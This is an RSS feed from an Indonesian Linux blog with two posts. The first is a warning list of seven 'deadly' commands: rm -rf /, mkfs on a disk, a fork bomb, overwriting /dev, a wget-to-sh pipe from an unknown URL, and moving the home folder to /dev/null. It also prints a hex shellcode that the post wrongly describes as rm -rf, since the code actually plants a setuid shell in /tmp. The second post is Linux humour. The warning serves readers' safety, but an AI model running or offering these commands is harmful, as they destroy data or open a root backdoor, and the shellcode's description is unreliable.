<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Migrasi Windows-Linux &#187; linux</title>
	<atom:link href="http://vavai.com/v2/tag/linux/feed/" rel="self" type="application/rss+xml" />
	<link>http://vavai.com/v2</link>
	<description>Panduan Mengenai Migrasi Windows-Linux &#038; Informasi Open Source</description>
	<lastBuildDate>Sat, 30 Jan 2010 04:58:19 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Awas : 7 Perintah Mematikan di Linux</title>
		<link>http://vavai.com/v2/2008/11/awas-7-perintah-mematikan-di-linux/</link>
		<comments>http://vavai.com/v2/2008/11/awas-7-perintah-mematikan-di-linux/#comments</comments>
		<pubDate>Sun, 30 Nov 2008 04:39:59 +0000</pubDate>
		<dc:creator>Masim "Vavai" Sugianto</dc:creator>
				<category><![CDATA[Tips]]></category>
		<category><![CDATA[linux]]></category>

		<guid isPermaLink="false">http://vavai.com/v2/?p=79</guid>
		<description><![CDATA[Linux terkenal karena aspek keamanan penggunaan. Virus yang berteman baik dengan Windows misalnya, harus mencari cara yang sangat rumit untuk bisa menembus Linux.
Meski demikian, dunia yang fana ini (hehehe&#8230;) merupakan tempat bagi beragam orang dengan berbagai sifat. Para penjahat dan psikopat bisa saja menyamar di berbagai forum dan mailing list, dan alih-alih memberikan solusi justru [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://vavai.com/v2/wp-content/uploads/lefoi-tux-skull-1834.png"><img class="alignleft size-full wp-image-84" title="lefoi-tux-skull-1834" src="http://vavai.com/v2/wp-content/uploads/lefoi-tux-skull-1834.png" alt="" width="205" height="205" /></a>Linux terkenal karena aspek keamanan penggunaan. Virus yang berteman baik dengan Windows misalnya, harus mencari cara yang sangat rumit untuk bisa menembus Linux.</p>
<p>Meski demikian, dunia yang fana ini (hehehe&#8230;) merupakan tempat bagi beragam orang dengan berbagai sifat. Para penjahat dan psikopat bisa saja menyamar di berbagai forum dan mailing list, dan alih-alih memberikan solusi justru bisa membuat anda menderita. Adakalanya perintah-perintah berbahaya di Linux dijadikan sebagai lelucon untuk menggoda (meski berbagai distro memiliki etika dan guiding principle yang melarang lelucon berbahaya) meski ada juga yang memang berniat menjebak orang lain.</p>
<p>Berikut adalah 7 perintah berbahaya yang disarikan dari <a href="http://www.junauza.com/2008/11/7-deadly-linux-commands.html">7 Deadly Command</a> :</p>
<ol>
<li><strong>Perintah rm -rf /</strong><br />
Perintah ini akan menghapus seluruh isi folder / (root folder atau root directory). Root folder memang dilindungi oleh hak akses user root, tapi akan sangat berbahaya jika perintah diatas dieksekusi saat kita berada dalam hak akses root. Itulah mengapa sangat dianjurkan untuk menggunakan hak akses user biasa untuk kegiatan sehari-hari.Perintah diatas juga tetap berbahaya jika dijalankan oleh user biasa yang dapat merusak isi folder miliknya sendiri</li>
<li><strong>Perintah menggunakan bilangan hexa</strong></li>
<p>char esp[] __attribute__ ((section(&#8220;.text&#8221;))) /* e.s.p<br />
release */<br />
= &#8220;\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68&#8243;<br />
&#8220;\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99&#8243;<br />
&#8220;\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7&#8243;<br />
&#8220;\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56&#8243;<br />
&#8220;\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31&#8243;<br />
&#8220;\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69&#8243;<br />
&#8220;\x6e\x2f\x73\x68\x00\x2d\x63\x00&#8243;<br />
&#8220;cp -p /bin/sh /tmp/.beyond; chmod 4755<br />
/tmp/.beyond;&#8221;;</p>
<p>Perintah diatas sama dengan perintah pada nomor 1 hanya saja ditulis dalam bilangan hexa. Jika dieksekusi, sama halnya menghapus seluruh isi folder (rm -rf /). Karena ditulis dalam bilangan hexa, perintah ini bisa juga menjebak user Linux yang berpengalaman</p>
<li> <strong>Perintah mkfs.ext3 /dev/sda</strong><br />
Perintah ini sama halnya melakukan perintah format pada partisi yang ditunjuk.</li>
<li> <strong>Perintah forkbomb</strong> <strong> <img src='http://vavai.com/v2/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> ){:|:&amp;};:</strong><br />
Perintah ini akan memerintahkan sistem untuk mengeksekusi berbagai proses sampai hang. Biasanya akan mengakibatkan hilangnya data karena komputer terpaksa harus dimatikan secara paksa.</li>
<li> <strong>Perintah apapun &gt; /dev</strong><br />
Perintah ini akan menimpa sistem file device yang ditunjuk dan pada akhirnya bisa menyebabkan hilangnya data yang dimounting pada folder /dev (folder /dev biasa digunakan untuk menempatkan keterangan hardware dan harddisk)</li>
<li><strong>Perintah untuk eksekusi file shell tertentu</strong><br />
Perintah <strong>wget http://alamat-url-yangtidak-jelas</strong> -O- | sh akan memerintahkan Linux untuk langsung menjalankan file sh yang ditunjuk. File sh adalah file eksekusi di Linux, sama halnya file .exe. Jangan sekali-kali melakukan perintah diatas untuk file sh yang tidak jelas sumber dan peruntukannya.</li>
<li><strong>Perintah memindahkan home folder ke /dev/null</strong><br />
<strong> mv /home/home-directory/* /dev/null</strong><br />
Perintah ini akan memindahkan seluruh data di home folder ke file null (file yang sebenarnya tidak ada). File yang dipindahkan akan hilang selamanya tanpa ada backup&#8230;</li>
</ol>
<p>Selain 7 perintah diatas, ada beberapa perintah lainnya yang mungkin belum dimasukkan disini. Prinsip hati-hati dalam menjalankan suatu perintah merupakan hal mutlak yang harus selalu diingat oleh pengguna Linux.</p>

                            <div id="aspdf">
                                <a href="http://vavai.com/v2/wp-content/plugins/as-pdf/generate.php?post=79">
                                    <span>*** Save as PDF ***</span>
                                </a>
                            </div>
                        <img src="http://vavai.com/v2/?ak_action=api_record_view&id=79&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://vavai.com/v2/2008/11/awas-7-perintah-mematikan-di-linux/feed/</wfw:commentRss>
		<slash:comments>19</slash:comments>
		</item>
		<item>
		<title>Intermezzo Seputar Linux (dan Windows)</title>
		<link>http://vavai.com/v2/2008/11/intermezzo-seputar-linux-dan-windows/</link>
		<comments>http://vavai.com/v2/2008/11/intermezzo-seputar-linux-dan-windows/#comments</comments>
		<pubDate>Sun, 30 Nov 2008 02:37:40 +0000</pubDate>
		<dc:creator>Masim "Vavai" Sugianto</dc:creator>
				<category><![CDATA[Intermezzo]]></category>
		<category><![CDATA[linux]]></category>

		<guid isPermaLink="false">http://vavai.com/v2/?p=67</guid>
		<description><![CDATA[
Terlalu serius menggunakan Linux ? Oh, tak masalah. Pengguna Linux memang tipe Geek yang bisa berkamikaze melakukan proyek &#8220;ngoprek&#8221; 2 hari 2 malam tanpa beranjak dari ruangan tempat ngoprek (Hei man, ini tahun 2008. Ada banyak cara untuk phone order  ). Meski demikian, pengguna Linux juga terkenal flamboyan dalam arti bahwa dia bisa terlihat [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://vavai.com/v2/wp-content/uploads/mnr1.jpg"><img class="alignnone size-full wp-image-76" title="mnr1" src="http://vavai.com/v2/wp-content/uploads/mnr1.jpg" alt="" width="490" height="367" /></a></p>
<p>Terlalu serius menggunakan Linux ? Oh, tak masalah. Pengguna Linux memang tipe Geek yang bisa berkamikaze melakukan proyek &#8220;ngoprek&#8221; 2 hari 2 malam tanpa beranjak dari ruangan tempat ngoprek (Hei man, ini tahun 2008. Ada banyak cara untuk phone order <img src='http://vavai.com/v2/wp-includes/images/smilies/icon_razz.gif' alt=':-P' class='wp-smiley' /> ). Meski demikian, pengguna Linux juga terkenal flamboyan dalam arti bahwa dia bisa terlihat serius tapi sebenarnya menyimpan potensi sebagai pelawak kelas berat.</p>
<p>Ada sebuah proyek wiki yang diciptakan untuk menampung luapan humor yang kebanyakan sarkasme ini. Mari kita lihat satu persatu.</p>
<p><strong>Tentang Richard Stallman :</strong></p>
<blockquote><p><strong>Richard Malodorous Stallman</strong> (also known as &#8220;<strong>rms</strong>&#8220;, &#8220;<strong>GNU/Stallman</strong>&#8220;, and sometimes <strong>Karl Marx</strong>) is the author and most prominent proponent of the <em>Grand Unified Theory of Free &amp; Accessible Technology</em> (GUTFAT), and the founder of the <a title="GNU" href="http://uncyclopedia.wikia.com/wiki/GNU">GNU</a>.  <em><strong>GNU</strong></em> is a clever and descriptive but <em>decidedly non-recursive</em> <a title="Acronym" href="http://uncyclopedia.wikia.com/wiki/Acronym">acronym</a> standing for <em>Generally Not Used</em>.</p>
<p>Essentially, <em>rms&#8217;s</em> theory states that it is more important for <a title="Free software" href="http://uncyclopedia.wikia.com/wiki/Free_software">software</a> to be <a title="Free" href="http://uncyclopedia.wikia.com/wiki/Free">free</a> than to be usable.  In later years he became the spokesperson for other freedom movements including free <a title="Love" href="http://uncyclopedia.wikia.com/wiki/Love">love</a>, free <a title="Tibet" href="http://uncyclopedia.wikia.com/wiki/Tibet">Tibet</a>, and free Whopper® with the purchase of a <em>Whopper Ultra Value Meal</em>®—for a limited time only, prices and participation may vary.</p></blockquote>
<p><strong>Tentang Linus Torvalds :</strong></p>
<blockquote><p><code>“<em>I worked very hard on creating a name that would appeal to the majority of people, and it certainly paid off: thousands of people are using Linus ...er, Linux just to be able to say 'Windows? Hah. I've got Linus!' Uhm, Linux.</em>”</code></p>
<dl>
<dd><code>~ <strong><strong class="selflink">Linus Torvalds</strong> on Linus Linux</strong></code> </dd>
</dl>
<p>A self-appointed leader, Torvalds publicly refers to himself as a <em>benevolent dictator</em> who will abdicate &#8220;the day people think <a title="Linux" href="http://uncyclopedia.wikia.com/wiki/Linux">Linux</a> would be better served by somebody else&#8221;.  However, it is common knowledge that he left the <a title="The Godfather" href="http://uncyclopedia.wikia.com/wiki/The_Godfather">severed head</a> of a carrot in the bed of the last person who dared challenge him for authority.</p></blockquote>
<p><strong>Tentang Fedora :</strong></p>
<p><strong>Lin Fedora</strong> <em>a.k.a. Linny Free</em> first came to the attention of the <a title="FBI" href="http://uncyclopedia.wikia.com/wiki/FBI">Bureau</a> on <a title="September" href="http://uncyclopedia.wikia.com/wiki/September">September</a> <a title="22" href="http://uncyclopedia.wikia.com/wiki/22" class="broken_link">22</a>, <a title="2003" href="http://uncyclopedia.wikia.com/wiki/2003">2003</a>, when covert <a title="Sound" href="http://uncyclopedia.wikia.com/wiki/Sound">audio</a>/<a title="Video" href="http://uncyclopedia.wikia.com/wiki/Video">video</a> surveillance observed a violent <a title="Chicken" href="http://uncyclopedia.wikia.com/wiki/Chicken">coup</a> on the premises of his former associate, suspected <a title="Drug" href="http://uncyclopedia.wikia.com/wiki/Drug">drug</a> <a title="Lord" href="http://uncyclopedia.wikia.com/wiki/Lord">lord</a> and <a title="Whore" href="http://uncyclopedia.wikia.com/wiki/Whore">whoremonger</a> <strong><a title="Red Dwarf" href="http://uncyclopedia.wikia.com/wiki/Red_Dwarf">Dwayne Dibley</a></strong> <em>a.k.a. Red Hat</em>.  <a title="Television" href="http://uncyclopedia.wikia.com/wiki/Television">Reception</a> was garbled and obscured by property damage and gunfire, but we were able to surmise that Dibley (or one of his operatives) attempted a hit on Fedora, ostensibly to prevent any further threat or encroachment on his <a class="new" title="Red Hat Enterprise Linux (not yet written)" href="http://uncyclopedia.wikia.com/index.php?title=Red_Hat_Enterprise_Linux&amp;action=edit&amp;redlink=1">enterprise</a>.</p>
<p><a href="http://vavai.com/v2/wp-content/uploads/180px-fedoracore.png"><img class="alignnone size-full wp-image-73" title="180px-fedoracore" src="http://vavai.com/v2/wp-content/uploads/180px-fedoracore.png" alt="" width="180" height="224" /></a></p>
<p><strong>Tentang openSUSE :</strong></p>
<blockquote><p>Before there was openSUSE there was SuSE Linux and before that there was S.u.S.E. . the name has changed over the years mainly because of threats from <a title="Linus Torvalds" href="http://uncyclopedia.wikia.com/wiki/Linus_Torvalds">Linus Torvalds</a> that if the name was not changed he would send tux out to kill the SuSE chameleon. There is currently a movement by <a title="Richard Stallman" href="http://uncyclopedia.wikia.com/wiki/Richard_Stallman">Richard M. Stallman</a> to force openSUSE to rename itself again to: <a class="new" title="GNU Linux (not yet written)" href="http://uncyclopedia.wikia.com/index.php?title=GNU_Linux&amp;action=edit&amp;redlink=1">GNU/openRichardStallmanisGod</a>.</p></blockquote>
<p><strong>Tentang Ubuntu :</strong></p>
<p>Lihat lucu-lucuan nama Ubuntu <a href="http://uncyclopedia.wikia.com/wiki/Ubuntu">disini</a>. Beberapa diantaranya&#8230;</p>
<ul>
<li>Hardy Hardon</li>
<li>Horny Hedgehog</li>
<li>Hungry Hippo</li>
<li>Insipid Ibex</li>
<li>Jabbering Jabberwock (The official Long Term Nonsense Release, Canonical will support it through backports indefinitely)</li>
</ul>
<p><strong>Jangan coba-coba install Gentoo :</strong></p>
<p><a href="http://vavai.com/v2/wp-content/uploads/mewhenreadingstupidstuff.gif"><img class="alignnone size-full wp-image-74" title="mewhenreadingstupidstuff" src="http://vavai.com/v2/wp-content/uploads/mewhenreadingstupidstuff.gif" alt="" width="150" height="107" /></a></p>
<p><strong>Bagaimana dengan sahabat terbaik Linux, Microsoft ?</strong></p>
<p>Mungkin sudah sangat terbiasa dengan &#8220;Press Any Key&#8221; tapi anda tidak menemukan tombol &#8220;Any&#8221; di keyboard ? Kalau gitu ganti Keyboard anda dengan keyboard terbaru yang sudah memuat tombol &#8220;Any&#8221; sehingga tidak perlu bingung lagi dilain waktu <img src='http://vavai.com/v2/wp-includes/images/smilies/icon_razz.gif' alt=':-P' class='wp-smiley' /> </p>
<p><a href="http://vavai.com/v2/wp-content/uploads/180px-press_any_key.jpg"><img class="alignnone size-full wp-image-68" title="180px-press_any_key" src="http://vavai.com/v2/wp-content/uploads/180px-press_any_key.jpg" alt="" /></a></p>
<p>Bagaimana dengan Iklan hasil edit sotosop ?</p>
<p><a href="http://vavai.com/v2/wp-content/uploads/billgatesubuntulinux.png"><img class="alignnone size-full wp-image-69" title="billgatesubuntulinux" src="http://vavai.com/v2/wp-content/uploads/billgatesubuntulinux.png" alt="" width="400" height="205" /></a></p>
<p>Atau feature paling terkenal, BSOD (Blue Screen of Death)</p>
<p><a href="http://vavai.com/v2/wp-content/uploads/startrek-bsod.gif"><img class="alignnone size-full wp-image-70" title="startrek-bsod" src="http://vavai.com/v2/wp-content/uploads/startrek-bsod.gif" alt="" width="320" height="240" /></a></p>
<p>Tapi sekarang sudah banyak perbaikan. BSOD itu sudah masa lalu. Sekarang security Windows pun sudah lebih mantap.</p>
<p><a href="http://vavai.com/v2/wp-content/uploads/vistaohlord.png"><img class="alignnone size-full wp-image-71" title="vistaohlord" src="http://vavai.com/v2/wp-content/uploads/vistaohlord.png" alt="" width="439" height="230" /></a></p>
<p><a href="http://vavai.com/v2/wp-content/uploads/vistaohlord2.png"><img class="alignnone size-full wp-image-72" title="vistaohlord2" src="http://vavai.com/v2/wp-content/uploads/vistaohlord2.png" alt="" width="439" height="230" /></a></p>
<p>Silakan merujuk ke halaman wiki lucu-lucuan <a href="http://uncyclopedia.wikia.com/wiki/Linux">disini</a>.</p>

                            <div id="aspdf">
                                <a href="http://vavai.com/v2/wp-content/plugins/as-pdf/generate.php?post=67">
                                    <span>*** Save as PDF ***</span>
                                </a>
                            </div>
                        <img src="http://vavai.com/v2/?ak_action=api_record_view&id=67&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://vavai.com/v2/2008/11/intermezzo-seputar-linux-dan-windows/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>

